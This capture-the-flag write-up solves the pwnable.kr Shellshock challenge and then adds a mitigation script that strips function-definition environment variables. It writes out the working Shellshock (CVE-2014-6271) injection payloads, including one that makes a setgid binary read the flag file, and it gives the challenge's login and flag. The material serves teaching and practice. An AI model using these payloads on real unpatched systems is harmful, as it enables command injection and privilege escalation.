pwnable.kr —— shellshock

question

Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)


ssh shellshock@pwnable.kr -p2222 (pw:guest)

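The challenge asks us to log in to the server over SSH with ssh shellshock@pwnable.kr -p2222; the password is guest. Sometimes the login runs into host identity verification; in that case add the option -o StrictHostKeyChecking=no, which turns off host key checking for that connection.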

analyse

The challenge description says this is about exploiting the Shellshock vulnerability.

shellshock@ubuntu:~$ ls -lth
total 960K
-r-xr-sr-x 1 root shellshock_pwn 8.4K Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
-r-xr-xr-x 1 root shellshock 937K Oct 12 2014 bash

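The permissions are as shown above: flag is readable only by root and the shellshock_pwn group, and the shellshock binary is setgid shellshock_pwn. Use the Shellshock PoC to check whether the bundled bash is vulnerable.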

shellshock@ubuntu:~$ env x='() { :;}; echo vulnerable' ./bash -c "echo test"
vulnerable
test

The PoC printed vulnerable, so the vulnerability is present in this bash.

get flag

shellshock@ubuntu:~$ env x='() { :;}; bash -c "cat flag"' ./shellshock 
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

flag: only if I knew CVE-2014-6271 ten years ago..!!
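The mitigation side of the PoC above, as an added example that is not part of the original write-up or the challenge's code: a privileged wrapper can drop every environment variable whose value has the PoC's `() {` shape before it starts a child program. The function names funcdef_env_names and run_scrubbed are hypothetical, and `env -u` is assumed to be available (GNU, BSD and BusyBox env provide it).

```shell
#!/bin/sh
# Added example: find and remove environment variables whose value is
# shaped like the PoC value on this page (it begins with "() {").

# Print the names of exported variables whose value begins with "() {".
# awk's ENVIRON array is used instead of parsing `env` output, so values
# that contain newlines cannot be mistaken for separate variables.
funcdef_env_names() {
    awk 'BEGIN {
        for (name in ENVIRON)
            if (index(ENVIRON[name], "() {") == 1)
                print name
    }' | sort
}

# Run "$@" with every such variable removed from the child's environment.
# `env -u NAME` is used rather than `unset` because it also accepts names
# that are not valid shell identifiers.
run_scrubbed() {
    (
        for name in $(funcdef_env_names); do
            set -- -u "$name" "$@"
        done
        exec env "$@"
    )
}

# Constructed sample: the PoC value from this page, exported as a variable.
x='() { :;}; echo vulnerable'
export x
run_scrubbed sh -c 'echo "x in child: ${x-<removed>}"'
```

Scrubbing only narrows what reaches the child; the actual fix for CVE-2014-6271 is a patched bash.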
